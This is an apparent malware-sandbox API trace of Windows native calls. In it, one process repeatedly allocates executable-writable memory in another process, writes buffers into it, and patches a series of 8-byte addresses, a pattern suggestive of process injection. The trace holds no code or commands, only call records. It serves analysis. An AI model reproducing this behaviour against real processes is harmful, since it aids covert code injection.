0x0 [0140.322] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.322] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.322] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.322] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.322] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.322] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a390, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.322] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.322] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f3c*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f3c*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.323] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.323] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.323] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.323] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.323] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.323] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.323] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.324] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.324] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.324] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.324] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.324] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.324] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a398, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.324] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.324] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f52*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f52*, NumberOfBytesWritten=0x28df88*=0x16) returned 0x0 [0140.324] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.325] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.325] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.325] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.325] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.325] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.325] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.325] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.325] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.326] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.326] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20026, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.326] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.326] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.326] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.326] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499f6*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499f6*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.326] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.326] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.327] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.327] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.327] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.327] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.327] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.327] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.327] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.327] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.327] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.328] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.328] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.328] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x23, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.328] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499dc*, NumberOfBytesToWrite=0xb, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499dc*, NumberOfBytesWritten=0x28df88*=0xb) returned 0x0 [0140.328] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.328] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.328] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.329] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.329] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.329] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.329] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.329] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.329] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.329] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.329] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001b, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.330] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.330] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.330] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.330] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499d4*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499d4*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0140.330] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.330] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.330] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.330] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.331] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.331] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.331] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.331] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.331] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.331] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.331] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.331] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.331] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.332] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.332] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499ca*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499ca*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.332] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.332] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.332] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.332] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.332] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.333] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.333] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.333] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.333] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.333] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.333] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.333] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.333] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.333] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.333] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499c2*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499c2*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0140.334] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.334] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.334] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.334] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.334] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.334] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.334] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.335] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.335] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.335] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.335] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.335] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.335] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.335] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.335] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499ba*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499ba*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0140.335] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.335] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.336] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.336] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.336] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.336] NtClearEvent (EventHandle=0x144) returned 0x0 